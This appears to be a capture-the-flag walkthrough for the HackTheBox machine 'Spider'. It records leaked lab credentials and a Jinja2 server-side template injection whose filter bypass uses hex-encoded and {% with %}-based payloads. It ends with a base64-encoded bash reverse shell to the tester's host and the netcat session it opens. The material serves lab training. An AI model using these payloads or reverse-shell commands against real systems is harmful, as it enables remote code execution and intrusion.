# got creds chiv:ch1VW4sHERE7331
# can use creds to login to spider.htb/login as chiv
Welcome to the admin panel, chiv.
| can submit new message
| view Messages
| View Support
http://spider.htb/view?check=messages
Staff of ID: '1' posted on: 2020-04-24 15:02:41
Fix the /a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal portal!
http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal
Submit a support ticket!
Welcome to the support portal!
| Contact # or Email:
| Message
SSTI (again)
injecting in both fields at http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal
checking reponse at http://spider.htb/view?check=support
{{config}}
# response
Why would you need '{{' or '}}' in a contact value?
# trying to inject only in message with {{7*7}} but nothing; so Contact# or Email seems the way forward
# trying more SSTI from https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
{% debug %}
# response
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
# almost all payloads have {{
# ignore them it returns error
| Why would you need '{{' or '}}' in a contact value?
request.__class__
# response
Hmmm, you seem to have hit a our WAF with the following chars: _ .
# there is a blacklist check
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}
{%endif%}
{%endfor%}
is converted (via hex encoding)
{% for a in []["5F5F636C6173735F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F626173655F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F737562636C61737365735F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]() %}
{% if "7761726E696E67"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78") in a["5F5F6E616D655F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")] %}
{{a()["5F6D6F64756C65"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F6275696C74696E735F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F696D706F72745F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]("6F73"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78"))["706F70656E"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]("6563686F2024666C6167"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78"))["72656164"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]()}}
{%endif%}
{%endfor%}
# but it still has '{{' '}}'
# tried by removing it, found more blacklist chars
Hmmm, you seem to have hit a our WAF with the following chars: for if
# Testing for all special chars on keyboard: [{]};:'",<.>/?\|`!@#$%^&*()
# updated blacklist = {{ }} for if _ .
# considering for if {{ }} are blacklisted, none of the top google searches are helping
# looking at jinja built in tags to understand more
| came across {% set var=x %} ... {% endset %}
| Creates a var that exists within the scope
# from https://hackmd.io/@Chivato/HyWsJ31dI
modifying {% if 'chiv' == 'chiv' %} a {% endif %} to {% set a= "chiv" %} a {% endset %}
# response
Hmmm, you seem to have hit a our WAF with the following chars: set
# updated blacklist = {} }} for if _ . set
# testing {% with myvar=1 %}...{% endwith %}
Using payload from notes
{{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']() }}
# modifying {{ }} to a different method using {% %}
# modifying ' to "
# modifying _ to \x5f
{% request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('id')['read']() %}
# using with
| {% with %} ... {% endwith %}
{% with kashz=request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("id")["read"]() %} kashz {% endwith %}
# it runs fine, but still prints kashz,
# reloading the page takes some time, possibly execution on backend?
# trying a blind payload
echo "bash -c 'bash -i >& /dev/tcp/10.10.16.7/6969 0>&1'"|base64
| YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi43LzY5NjkgMD4mMScK
# final payload
{% with kashz=request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi43LzY5NjkgMD4mMScK |base64 -d|bash")["read"]() %} kashz {% endwith %}
// So# we get shell
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.243] 43738
bash: cannot set terminal process group (1597): Inappropriate ioctl for device
bash: no job control in this shell
chiv@spider:/var/www/webapp$ whoami;id;hostname;uname -a
chiv
uid=1000(chiv) gid=33(www-data) groups=33(www-data)
spider
Linux spider 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux